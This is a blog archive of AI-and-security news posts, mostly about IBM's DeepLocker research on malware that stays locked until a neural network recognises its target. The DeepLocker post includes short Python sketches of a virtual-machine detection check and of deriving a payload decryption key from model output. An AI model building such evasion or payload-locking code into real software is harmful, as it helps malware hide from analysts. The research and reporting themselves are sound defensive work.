Category Archives: artificial intelligence

HOTforSecurity: DeepLocker: new breed of malware that uses AI to fly under the radar

IBM researchers are seeking to raise awareness that AI-powered threats are coming our way soon. To that end, they’ve created an all-new breed of malware to provide insights into how to reduce risks and deploy adequate countermeasures.

DeepLocker was showcased at Black Hat USA 2018, the hacker conference that provides security consulting, training, and briefings to hackers, corporations, and government agencies globally.

Researchers Marc Ph. Stoecklin, Jiyong Jang, and Dhilung Kirat demonstrated how a piece of malware can be specifically targeted at one person and not others by training a neural network to recognize the victim’s face. The malware is obfuscated and hidden inside a legitimate program, in this case a video conferencing app.

When the AI finds its target, it triggers the unlock key that de-obfuscates the hidden malware and executes it. For this proof of concept, they used WannaCry itself – the infamous ransomware that made headlines last year.

“What is unique about DeepLocker is that the use of AI makes the ‘trigger conditions’ to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model,” Stoecklin writes.

“The AI model is trained to behave normally unless it is presented with a specific input: the trigger conditions identifying specific victims. The neural network produces the “key” needed to unlock the attack. DeepLocker can leverage several attributes to identify its target, including visual, audio, geolocation and system-level features. As it is virtually impossible to exhaustively enumerate all possible trigger conditions for the AI model, this method would make it extremely challenging for malware analysts to reverse engineer the neural network and recover the mission-critical secrets, including the attack payload and the specifics of the target,” Stoecklin explains.

The novel method allows for three layers of concealment: target class concealment; target instance concealment; malicious intent concealment.

When launched, the video-conferencing app feeds images of the subject into the embedded AI model, while behaving normally for all others using the app at the same time on their respective terminals.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The aim of the team’s briefing is not to give bad actors ideas, but to raise awareness about rising AI-powered threats. Defenders also need to leverage AI to create defenses against these new types of attack, the team said.

“Current defenses will become obsolete and new defenses are needed,” the trio conclude in their presentation.

How AI Can Tame and Control Shadow IT in the Enterprise

‘Shadow IT’, usually described as “information-technology systems and solutions built and used inside organizations without explicit organizational approval”, offers cyber-criminals an easy entry point into corporate systems and is now

The post How AI Can Tame and Control Shadow IT in the Enterprise appeared first on The Cyber Security Place.

DeepLocker – AI-powered malware are already among us

Security researchers at IBM Research have developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker, which they will present today.

What about Artificial Intelligence (AI) applied to malware development? Threat actors can use AI-powered malware to create powerful malicious code that can evade sophisticated defenses.

Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI, dubbed DeepLocker, that is able to conceal its malicious intent until it reaches its specific target.

“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.

“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.” 

According to the IBM researchers, DeepLocker is able to avoid detection and activate itself only after specific conditions are matched.
AI-powered malware represents a privileged option in highly targeted attacks like the ones carried out by nation-state actors.
The malicious code can be concealed in benign applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.

“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.

“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”

[Figure: DeepLocker chart]

The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it stealthy until the victim is identified through facial recognition. The experts pointed out that the target can be identified by matching their face against publicly available photos.

“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”

“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The IBM Research group will provide further details today in a live demo at the Black Hat USA security conference in Las Vegas.

Pierluigi Paganini

(Security Affairs – AI-powered malware, DeepLocker)

The post DeepLocker – AI-powered malware are already among us appeared first on Security Affairs.

Researchers Developed Artificial Intelligence-Powered Stealthy Malware

Artificial Intelligence (AI) has been seen as a potential solution for automatically detecting and combating malware, and stop cyber attacks before they affect any organization. However, the same technology can also be weaponized by threat actors to power a new generation of malware that can evade even the best cyber-security defenses and infects a computer network or launch an attack only

How to Outsmart the Smart City

Today’s digital world has created new ways to keep us all informed and safe while automating our daily lives. Our phones send us alerts about weather hazards, traffic issues and lost children. We trust these systems since we have no reason not to — but that trust has been tested before.

For a tense 38 minutes in January 2018, residents of Hawaii saw the following civil alert message on their mobile devices: “BALLISTIC MISSILE THREAT INBOUND TO HAWAII. SEEK IMMEDIATE SHELTER. THIS IS NOT A DRILL.”

This false alarm was eventually attributed to human error, but what if someone intentionally caused panic using these types of systems?

Smart City View

This incident in Hawaii was part of what motivated our team of researchers from Threatcare and IBM X-Force Red to join forces and test several smart city devices, with the specific goal of investigating “supervillain-level” attacks from afar. We found 17 zero-day vulnerabilities in four smart city systems — eight of which are critical in severity. While we were prepared to dig deep to find vulnerabilities, our initial testing yielded some of the most common security issues, such as default passwords, authentication bypass and SQL injections, making us realize that smart cities are already exposed to old-school threats that should not be part of any smart environment.

So, what do smart city systems do? There are a number of different functions that smart city technology can perform — from detecting and attempting to mitigate traffic congestion to disaster detection and response to remote control of industry and public utilities.

The devices we tested fall into three categories: intelligent transportation systems, disaster management and the industrial Internet of Things (IoT). They communicate via Wi-Fi, 4G cellular, ZigBee and other communication protocols and platforms. Data generated by these systems and their sensors is fed into interfaces that tell us things about the state of our cities — like that the water level at the dam is getting too high, the radiation levels near the nuclear power plant are safe or the traffic on the highway is not too bad today.

Read the interactive white paper: The Dangers of Smart City Hacking

Smart City Vulnerable

Earlier this year, our team tested smart city systems from Libelium, Echelon and Battelle. Libelium is a manufacturer of hardware for wireless sensor networks. Echelon sells industrial IoT, embedded and building applications and manufacturing devices like networked lighting controls. Battelle is a nonprofit that develops and commercializes technology.

When we found vulnerabilities in the products these vendors produce, our team disclosed them to the vendors. All the vendors were responsive and have since issued patches and software updates to address the flaws we’ll detail here.

After we found the vulnerabilities and developed exploits to test their viability in an attack scenario, our team found dozens (and, in some cases, hundreds) of each vendor’s devices exposed to remote access on the internet. All we did was use common search engines like Shodan or Censys, which are accessible to anyone using a computer.

Once we located an exposed device using some standard internet searches, we were able to determine in some instances who purchased the devices and, most importantly, what they were using the devices for. We found a European country using vulnerable devices for radiation detection and a major U.S. city using them for traffic monitoring. Upon discovering these vulnerabilities, our team promptly alerted the proper authorities and agencies of these risks.

Smart City Scare

Now, here’s where “panic attacks” could become a real threat. According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic. While no evidence exists that such attacks have taken place, we have found vulnerable systems in major cities in the U.S., Europe and elsewhere.

Here are some examples we found disturbing:

  • Flood warnings (or lack thereof): Attackers could manipulate water level sensor responses to report flooding in an area where there is none — creating panic, evacuations and destabilization. Conversely, attackers could silence flood sensors to prevent warning of an actual flood event, whether caused by natural means or in combination with the destruction of a dam or water reservoir.
  • Radiation alarms: Similar to the flood scenario, attackers could trigger a radiation leak warning in the area surrounding a nuclear power plant without any actual imminent danger. The resulting panic among civilians would be heightened due to the relatively invisible nature of radiation and the difficulty in confirming danger.
  • General chaos (via traffic, gunshot reports, building alarms, emergency alarms, etc.): Pick your favorite crime action movie from the last few years, and there’s a good chance that some hacker magically controls traffic signals and reroutes vehicles. While they’re usually shown hacking into “metro traffic control” or similar systems, things in the real world can be even less complicated. If one could control a few square blocks worth of remote traffic sensors, they could create a similar gridlock effect as seen in the movies. Those gridlocks typically show up when criminals need a few extra minutes to evade the cops or hope to send them on a wild goose chase. Controlling additional systems could enable an attacker to set off a string of building alarms or trigger gunshot sounds on audio sensors across town, further fueling panic.

In summary, the effects of vulnerable smart city devices are no laughing matter, and security around these sensors and controls must be a lot more stringent to prevent scenarios like the few we described.

The Vulnerabilities

IBM X-Force Red and Threatcare have so far discovered and disclosed 17 vulnerabilities in four smart city systems from three different vendors. The vulnerabilities are listed below in order of criticality for each vendor we tested:

Meshlium by Libelium (wireless sensor networks)

  • (4) CRITICAL — pre-authentication shell injection flaw in Meshlium (four distinct instances)

i.LON 100/i.LON SmartServer and i.LON 600 by Echelon

  • CRITICAL — i.LON 100 default configuration allows authentication bypass – CVE-2018-10627
  • CRITICAL — i.LON 100 and i.LON 600 authentication bypass flaw – CVE-2018-8859
  • HIGH — i.LON 100 and i.LON 600 default credentials
  • MEDIUM — i.LON 100 and i.LON 600 unencrypted communications – CVE-2018-8855
  • LOW — i.LON 100 and i.LON 600 plaintext passwords – CVE-2018-8851

V2I (vehicle-to-infrastructure) Hub v2.5.1 by Battelle

V2I Hub v3.0 by Battelle

The Fixes

Smart city technology spending is anticipated to hit $80 billion this year and grow to $135 billion by 2021. As smart cities become more common, the industry needs to re-examine the frameworks for these systems to design and test them with security in mind from the start.

In light of our findings, here are some recommendations to help secure smart city systems:

  • Implement IP address restrictions to connect to the smart city systems;
  • Leverage basic application scanning tools that can help identify simple flaws;
  • Safer password and API key practices can go a long way in preventing an attack;
  • Take advantage of security incident and event management (SIEM) tools to identify suspicious traffic; and
  • Hire “hackers” to test systems for software and hardware vulnerabilities. There are teams of security professionals — such as IBM X-Force Red — that are trained to “think like a hacker” and find the flaws in systems before the bad guys do.

Additionally, security researchers can continue to drive research and awareness in this space, which is what IBM X-Force Red and Threatcare intended to do with this project. Jen Savage, Mauro Paredes and I will be presenting these vulnerabilities at Black Hat 2018, and again at the DEF CON 26 Hacking Conference later this week, so check back soon for the video presentation.

For remediation and security patches, see the vendor pages listed below:

Echelon: https://www.echelon.com/company/security/security-advisories

Read the interactive white paper: The Dangers of Smart City Hacking

The post How to Outsmart the Smart City appeared first on Security Intelligence.

DeepLocker: How AI Can Power a Stealthy New Breed of Malware

With contributions from Jiyong Jang and Dhilung Kirat.

Cybersecurity is an arms race, where attackers and defenders play a constantly evolving cat-and-mouse game. Every new era of computing has served attackers with new capabilities and vulnerabilities to execute their nefarious actions.

In the PC era, we witnessed malware threats emerging from viruses and worms, and the security industry responded with antivirus software. In the web era, attacks such as cross-site request forgery (CSRF) and cross-site scripting (XSS) were challenging web applications. Now, we are in the cloud, analytics, mobile and social (CAMS) era — and advanced persistent threats (APTs) have been on the top of CIOs’ and CSOs’ minds.

But we are on the cusp of a new era: the artificial intelligence (AI) era. The shift to machine learning and AI is the next major progression in IT. However, cybercriminals are also studying AI to use it to their advantage — and weaponize it. How will the use of AI change cyberattacks? What are the characteristics of AI-powered attacks? And how can we defend against them?

At IBM Research, we are constantly studying the evolution of technologies, capabilities and techniques in order to identify and predict new threats and stay ahead of cybercriminals. One of the outcomes, which we will present at the Black Hat USA 2018 conference, is DeepLocker, a new breed of highly targeted and evasive attack tools powered by AI.

IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware. This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.

You can think of this capability as similar to a sniper attack, in contrast to the “spray and pray” approach of traditional malware. DeepLocker is designed to be stealthy. It flies under the radar, avoiding detection until the precise moment it recognizes a specific target. This AI-powered malware is particularly dangerous because, like nation-state malware, it could infect millions of systems without being detected. But, unlike nation-state malware, it is feasible in the civilian and commercial realms.

A Bit of Evasive Malware History

The DeepLocker class of malware stands in stark contrast to existing evasion techniques used by malware seen in the wild. While many malware variants try to hide their presence and malicious intent, none are as effective at doing so as DeepLocker.

Let’s recap the evolution of evasive malware:

  • In the late 1980s and early 1990s, the first variants of polymorphic and metamorphic viruses were designed to disrupt and destroy data. By means of obfuscation and mutating payloads, malware authors were avoiding antivirus systems that could easily screen files for known patterns using static signatures. Consequently, the antivirus industry gradually developed static code and malware-analysis capabilities to analyze obfuscated code and infer the malicious intent of code or files running on the endpoints they protected.
  • In the 1990s, malware authors started to encrypt the malicious payload (using so-called packers), such that the malicious code would only be observable when it was decrypted into memory before its execution. The security industry responded with dynamic malware analysis, building initial versions of malware sandboxes, such as virtualized systems, in which suspicious executables (called samples) are run, their activities monitored and their nature deemed benign or malicious.
  • Of course, attackers would not give in. In the 2000s, the first forms of evasive malware — malware trying to actively avoid analysis — were captured in the wild. For example, the malware used checks to identify whether it was running in a virtualized environment and whether other processes known to run in malware sandboxes were present. If any were found, the malware would stop executing its malicious payload in order to avoid analysis and keep its secrets encrypted. This approach is still prevalent today, as a May 2018 Security Week study found that 98 percent of the malware samples analyzed use evasive techniques to varying extents (a minimal sketch of such an environment check follows this list).
  • As malware sandboxes have become increasingly sophisticated in the past few years — for example, using bare-metal analysis systems that run on real hardware and avoid virtualization, as described by the Computer Security Group at the University of California, Santa Barbara — adversaries have moved to a different strategy: targeted attacks. They design their infection routines with an initial step that carefully inspects the environment they run in for any predefined “suspicious” features, such as usernames and security solution processes. Only if the target endpoint is found “clear” would the malware be fetched and executed, unleashing its nefarious activity. One well-known example of evasion is the Stuxnet worm, which was programmed to target and seek out only specific industrial control systems (ICS) from a particular manufacturer, and only with certain hardware and software configurations.
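
As an illustration of this kind of environment check, here is a minimal Python sketch that compares the machine's MAC address against OUI prefixes registered to common hypervisor vendors. The prefixes are real vendor OUIs, but the function and its decision logic are hypothetical and far simpler than what evasive malware actually does:

    import uuid

    # OUI prefixes registered to hypervisor vendors:
    # 08:00:27 (VirtualBox); 00:05:69, 00:0C:29, 00:50:56 (VMware)
    VM_OUI_PREFIXES = ("080027", "000569", "000C29", "005056")

    def looks_like_virtual_machine():
        # uuid.getnode() returns the primary interface's 48-bit MAC address.
        mac = "%012X" % uuid.getnode()
        return mac.startswith(VM_OUI_PREFIXES)

    # Evasive malware would withhold its payload when this returns True;
    # defenders can run the same check to confirm a sandbox is well hidden.
    print("VM indicators found:", looks_like_virtual_machine())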

Nevertheless, although malware evasion keeps evolving, even very recent forms of targeted malware require predefined triggers that can be exposed by defenders by checking the code, packed code, configuration files or network activity. All of these triggers are observable to skilled malware analysts with the appropriate tools.

DeepLocker: Ultra-Targeted and Evasive Malware

DeepLocker has changed the game of malware evasion by taking a fundamentally different approach from any other current evasive and targeted malware. DeepLocker hides its malicious payload in benign carrier applications, such as video conferencing software, to avoid detection by most antivirus and malware scanners.

What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.

The AI model is trained to behave normally unless it is presented with a specific input: the trigger conditions identifying specific victims. The neural network produces the “key” needed to unlock the attack. DeepLocker can leverage several attributes to identify its target, including visual, audio, geolocation and system-level features. As it is virtually impossible to exhaustively enumerate all possible trigger conditions for the AI model, this method would make it extremely challenging for malware analysts to reverse engineer the neural network and recover the mission-critical secrets, including the attack payload and the specifics of the target. When attackers attempt to infiltrate a target with malware, a stealthy, targeted attack needs to conceal two main components: the trigger condition(s) and the attack payload.

DeepLocker is able to leverage the “black-box” nature of the DNN AI model to conceal the trigger condition. A simple “if this, then that” trigger condition is transformed into a deep convolutional network of the AI model that is very hard to decipher. In addition to that, it is able to convert the concealed trigger condition itself into a “password” or “key” that is required to unlock the attack payload.
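
To make the key-derivation idea concrete, here is a minimal Python sketch using the cryptography library. The model call, the output vector and every name in it are hypothetical stand-ins, since IBM has not published DeepLocker's implementation; the point is only that the decryption key appears nowhere in the code and is reproduced solely when the network emits the right output:

    import base64
    import hashlib
    from cryptography.fernet import Fernet, InvalidToken

    def key_from_model_output(output_vector):
        # Quantize the DNN output so the intended target always yields the
        # same bytes, then hash those bytes into a Fernet-compatible key.
        quantized = bytes(int(x * 255) & 0xFF for x in output_vector)
        return base64.urlsafe_b64encode(hashlib.sha256(quantized).digest())

    def try_unlock(encrypted_payload, output_vector):
        # Only the intended target's attributes reproduce the key; for
        # anyone else, decryption fails and the payload stays opaque.
        try:
            return Fernet(key_from_model_output(output_vector)).decrypt(encrypted_payload)
        except InvalidToken:
            return None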

Technically, this method allows three layers of attack concealment. That is, given a DeepLocker AI model alone, it is extremely difficult for malware analysts to figure out what class of target it is looking for. Is it after people’s faces or some other visual clues? What specific instance of the target class is the valid trigger condition? And what is the ultimate goal of the attack payload?

DeepLocker Overview Chart
Figure 1. DeepLocker – AI-Powered Concealment

To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.

Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target. When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.

It’s important to understand that DeepLocker describes an entirely new class of malware — any number of AI models could be plugged in to find the intended victim, and different types of malware could be used as the “payload” that is hidden within the application.

DeepLocker Briefing at Black Hat USA

Alongside my colleagues Dhilung Kirat and Jiyong Jang, I will present the implications of AI-powered malware (and DeepLocker in particular) at Black Hat USA 2018. We will show how we combined open-source AI tools with straightforward evasion techniques to build a targeted, evasive and highly effective malware.

The aim of our briefing is threefold:

  1. To raise awareness that AI-powered threats like DeepLocker are coming our way very soon;
  2. To demonstrate how attackers have the capability to build stealthy malware that can circumvent defenses commonly deployed today; and
  3. To provide insights into how to reduce risks and deploy adequate countermeasures.

While a class of malware like DeepLocker has not been seen in the wild to date, these AI tools are publicly available, as are the malware techniques being employed — so it’s only a matter of time before we start seeing these tools combined by adversarial actors and cybercriminals. In fact, we would not be surprised if this type of attack were already being deployed.

The security community needs to prepare to face a new level of AI-powered attacks. We can’t, as an industry, simply wait until the attacks are found in the wild to start preparing our defenses. To borrow an analogy from the medical field, we need to examine the virus to create the “vaccine.”

To that effect, IBM Research has been studying AI-powered attacks and identified several new traits compared to traditional attacks. In particular, the increased evasiveness of AI-powered attacks challenges traditional rule-based security tools. AI can learn the rules and evade them. Moreover, AI enables new scales and speeds of attacks by acting autonomously and adaptively.

We, as defenders, also need to lean into the power of AI as we develop defenses against these new types of attack. A few areas that we should focus on immediately include the use of AI in detectors; going beyond rule-based security, reasoning and automation to enhance the effectiveness of security teams; and cyber deception to misdirect and deactivate AI-powered attacks.

Additionally, it would be beneficial to focus on monitoring and analyzing how apps behave across user devices, and flagging events when a new app is taking unexpected actions. This detection tactic could help identify these types of attacks in the future.

The post DeepLocker: How AI Can Power a Stealthy New Breed of Malware appeared first on Security Intelligence.

Most IT decision makers believe AI is the silver bullet to cybersecurity challenges

New research from ESET reveals that three in four IT decision makers (75%) believe that AI and ML are the silver bullet to solving their cybersecurity challenges. In the past year, the amount of content published in marketing materials, media and social media on the role of AI in cybersecurity has grown enormously. ESET surveyed 900 IT decision makers across the US, UK and Germany on their opinions and attitudes to AI and ML in … More

The post Most IT decision makers believe AI is the silver bullet to cybersecurity challenges appeared first on Help Net Security.

Could AI be the ‘silver bullet’ to cybersecurity?

Three quarters of IT decision makers believe AI and ML are the silver bullet to cybersecurity challenges. New research from the cybersecurity firm ESET has revealed that the recent hype surrounding AI

The post Could AI be the ‘silver bullet’ to cybersecurity? appeared first on The Cyber Security Place.

The State of Cybersecurity: A CISO and CTO Dish on AI, Emerging Threats, Crisis Leadership and More

What’s it like to spend time with two renowned leaders in the cybersecurity field? Enlightening, to say the very least.

I recently sat down to speak with Sridhar Muppidi, chief technology officer (CTO) of cloud security and identity and access management (IAM) at IBM Security, and Shamla Naidoo, global chief information security officer (CISO) at IBM. During our conversation, Muppidi and Naidoo covered topics ranging from the research and development behind Watson and the roles of artificial intelligence (AI) and blockchain in cybersecurity to advice for responding to emerging threats.

IBM Security CTO Talks AI, Orchestration and More

In addition to his role at IBM Security, Muppidi is one of 101 active IBM Fellows. He’s an executive sponsor of the IBM Australia Development Lab on the Gold Coast and encourages an open client engagement approach. As I observed him hosting a number of clients, we discussed a wide variety of cybersecurity innovations.

IBM is currently focused on bringing AI into the world in a safe manner. AI can help security teams boost their threat detection and response capabilities, minimize identity fraud, thwart insider threats and reduce false positives in application testing — to name just a few examples.

However, since adversaries have access to the same AI tools as defenders, IBM Research developed an Adversarial Robustness Toolbox to help secure AI systems from threat actors.

IBM is also developing several orchestration playbooks to ensure that the right analysts are using the right tools to perform the right tasks in the event of any security incident. Clients can experience a simulated cyberattack and practice their incident response playbooks at the IBM X-Force Command Center. These simulations help organizations understand the importance of a strong security culture, a robust response playbook and competent leadership in the face of a crisis.

Muppidi stressed that security is a team sport. For this reason, IBM created an ecosystem of vendors who work together through open interfaces and share intelligence and analytics to foster collaboration and defend against increasingly sophisticated threats.

Finally, Muppidi talked about the emergence of decentralized identity, which gives control of identity information back to users while mitigating the burden of data ownership for organizations. This is based on blockchain’s distributed ledger technology and cryptography. IBM is focused on developing open standards and enabling clients to create or participate in identity networks to solve business problems.

IBM CISO Says Size Doesn’t Matter When It Comes to Security

Naidoo is responsible for securing the entire corporation from emerging threats as the global CISO at IBM. She has the power of IBM Security technologies at her fingertips and uses them extensively in her role. I joined Shamla for two board round tables and several client meetings in Melbourne and Sydney, Australia.

These peer-level conversations exposed the following:

  • The importance of scale: Cybersecurity challenges, approaches, investments and execution are the same for all companies — both large and small. The only difference is scale. As scale increases, it’s essential to invest in the right security technologies to account for the expanded threat surface that comes with this growth.
  • Consider organizational structure: It’s also important to consider your organizational structure. While security leaders should supply all executives and line-of-business leaders with best-in-breed technologies to protect data, they should also empower them to manage their own security and compliance whenever possible through training and awareness initiatives.

These insights reflect the diversity of thinking the cybersecurity community needs to combat the rising volume of threats and protect clients from increasingly sophisticated attackers.

A Critical Advantage in the Fight for Security

Organizations that aim to deliver cybersecurity services to their own customers should be prepared to be “customer zero” with these services. This helps to ensure that the quality of offerings stands up to market scrutiny and that clients experience the best possible outcome.

By delivering the same quality of products they use to protect their own networks, industry leaders like Muppidi and Naidoo can give their clients a critical advantage in the endless battle to protect corporate and customer information from data thieves.

Read the stories in the ‘Secure Start’ blog series — and learn from others’ mistakes

The post The State of Cybersecurity: A CISO and CTO Dish on AI, Emerging Threats, Crisis Leadership and More appeared first on Security Intelligence.

An AI Chatbot and Voice Assistant for the Mobile Employee

Have a look around, and you might notice that chatbots and voice assistants have permeated our lives — bringing an air of excitement and efficiency to manual tasks and chores. Considering the amount of time and effort we expend at the office, it’s about time that assistants make their way to the workplace.

Although IT and security leaders are making ongoing strides to ensure their workers are enabled with the most cutting-edge technology, the employees they support continue to dedicate countless hours to basic tasks that could otherwise be delegated to an artificial intelligence (AI)-powered sidekick.

It can also be a struggle for workers to overcome learning curve challenges or get on-the-go help with support-related issues. Think about the number of requests and tickets that could be avoided if users had the ability to get this level of support from an AI voice assistant.

Why Mobile Employees Could Use Some Assistance

It can be frustrating trying to find a specific email or attachment when on a mobile device, oftentimes leading to multiple searches and dead ends. Think of how many times you’ve said things like, “Sure, I’ll pull that up and send it over when I get back to my laptop.”

It’s even more frustrating attempting to schedule a meeting when the organizer is forced to look up the availability of all the participants, type out the title and define an agenda. Something that is seemingly simple is anything but when put into practice.

Smartphones and tablets are designed to provide everything you need in the palm of your hand, but sometimes there’s too much in front of you to know how to prioritize. Imagine the headaches that could be avoided if employees had a helper that could constantly query their emails, calendars and contacts for them and notify them when they’ve let an email response to an important person — such as their boss — slip a bit too long.

There also can be times when devices just don’t work the way they’re supposed to. Perhaps you’re having trouble figuring out how to do something, like how to reset your passcode or turn on notifications, for example. In times like these, employees want on-demand support, but without a viable alternative, they turn to their IT helpdesk team to answer the call.

Join the Aug. 23 webinar: Help is on its way! A Sidekick For Your Mobile Workforce

Say Hello to an AI-Enabled Voice Assistant

IBM MaaS360, an industry leader in unified endpoint management (UEM), is pleased to introduce MaaS360 Assistant, the latest addition to its unique assortment of AI offerings. Enabled by chat and voice, MaaS360 Assistant is available for use by mobile employees today through open beta.

Programmed to improve productivity and deliver the best possible user experience, MaaS360 Assistant is now at the ready to respond to common questions across email, corporate contacts and calendar using natural language processing (NLP) capabilities.

An Even Better MaaS360 Assistant Tomorrow

Assistant was developed with AI capabilities that enable it to learn, evolve and become more accurate over time. In fact, it’s already begun learning.

Soon, this intelligent voice assistant will deliver notifications and insights that improve user awareness and prioritization surrounding their everyday activities, making it possible to follow up with the click of a button. For example, if your boss emailed you a week ago and you haven’t responded, you’ll get a nudge.

It’ll also be able to provide expert support and guidance, eliminating the user’s need to depend on the support team to resolve common issues.

Finally, the solution will integrate with third-party enterprise apps (e.g., human resources, customer relationship management and content management). Instead of swapping between enterprise apps, users can now rely on AI and NLP capabilities to perform tasks and get information.

Get Acquainted With Assistant

MaaS360 customers with Secure Mail are all set to enable their mobile employees. Just check in with your account manager to learn how to take full advantage.

To see MaaS360 Assistant in action and learn more about what it has to offer, register for the live webinar, “Help Is On Its Way! A Sidekick for Your Mobile Workforce,” on Aug. 23 at 11 a.m. EST.

The post An AI Chatbot and Voice Assistant for the Mobile Employee appeared first on Security Intelligence.

AI Protects DoD Networks from Zero-Day Exploits

The Department of Defense’s network is protected from malware threats by Sharkseer, one of the top National Security Agency or

AI Protects DoD Networks from Zero-Day Exploits on Latest Hacking News.

Most organizations investing in AI, very few succeeding

Today, only one in three AI projects are succeeding, and, perhaps more importantly, it is taking businesses more than six months to go from concept to production, according to Databricks. The primary reasons behind these challenges are that 96 percent of organizations face data-related problems like silos and inconsistent datasets, and 80 percent cite significant organizational friction like lack of collaboration between data scientists and data engineers. IT executives point to unified analytics as a … More

The post Most organizations investing in AI, very few succeeding appeared first on Help Net Security.

Quantum computing revenue to hit $15 billion in 2028 due to AI, R&D, cybersecurity

Total revenue generated from quantum computing services will exceed $15 billion by 2028, forecasts ABI Research. The demand for quantum computing services will be driven by some process hungry research and development projects as well as by the emergence of several applications including advanced artificial intelligence algorithms, next-generation encryption, traffic routing and scheduling, protein synthesis, and/or the design of advanced chemicals and materials. These applications require a new processing paradigm that classical computers, bound by … More

The post Quantum computing revenue to hit $15 billion in 2028 due to AI, R&D, cybersecurity appeared first on Help Net Security.

New AI Program can Effectively Remove the Noise from a Photograph

On July 9, researchers from NVIDIA, Aalto University, and MIT unveiled yet another AI program that can effectively remove noise and artifacts from pictures. This AI algorithm is the first of its kind, as it doesn't even require a "clean" reference picture to work.

To build their noise-filtering AI, the researchers began by adding noise to 50,000 sets of clean pictures and then fed these grainy pictures to their AI, training it to remove the noise and reveal a cleaned-up version of the photograph, one that looked nearly indistinguishable from the picture before the noise was added.
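
As a rough illustration of that data-preparation step, the NumPy sketch below adds synthetic Gaussian noise to a clean image array to produce a grainy training input; the noise level and image shape are arbitrary assumptions, not NVIDIA's actual training setup:

    import numpy as np

    def add_gaussian_noise(clean_image, sigma=25.0):
        # clean_image: float array with pixel values in [0, 255]
        noise = np.random.normal(0.0, sigma, clean_image.shape)
        return np.clip(clean_image + noise, 0.0, 255.0)

    # One (noisy, clean) training pair built from a random stand-in "photo".
    clean = np.random.uniform(0, 255, size=(256, 256, 3))
    noisy = add_gaussian_noise(clean)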

After training their AI, the researchers tested it on three sets of pictures to which they had added noise, and found that the system could denoise the photographs in milliseconds, producing a version only slightly softer-looking than the original before the noise was added.

The researchers say their algorithm can be used to denoise old grainy photographs, remove text-based watermarks, clean up medical scans taken with undersampled inputs, enhance astronomical photography, and denoise synthetically generated pictures.

This, however, isn't the first example of an AI that can enhance low-quality photos, and certainly not the first time NVIDIA's research team has been behind such impressive research.

In April, NVIDIA and other researchers created an AI-based algorithm that can reconstruct pictures from which large chunks of content have been removed.
And in May, NVIDIA and fellow researchers created an AI algorithm that can teach robots to perform various tasks just by watching a few repetitions performed by human workers.

It's not yet clear when, or if, this software will become available to the general public. But when that day comes, the researchers believe it could be helpful for a variety of applications, from astronomy to medical imaging.

Are security professionals moving fast enough?

Anthony O’Mara, from Malwarebytes, explains to Information Age why security professionals need to move much faster to beat cyber criminals. With the increase in threats the cybersecurity industry faces, alongside

The post Are security professionals moving fast enough? appeared first on The Cyber Security Place.

File-Based Malware: Considering A Different And Specific Security Approach

The cybersecurity solutions landscape has evolved from simple but effective signature-based scanning solutions to sandboxing—the isolating layer of security between your system and malware—and, most recently, to sophisticated detection methods.

The post File-Based Malware: Considering A Different And Specific Security Approach appeared first on The Cyber Security Place.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


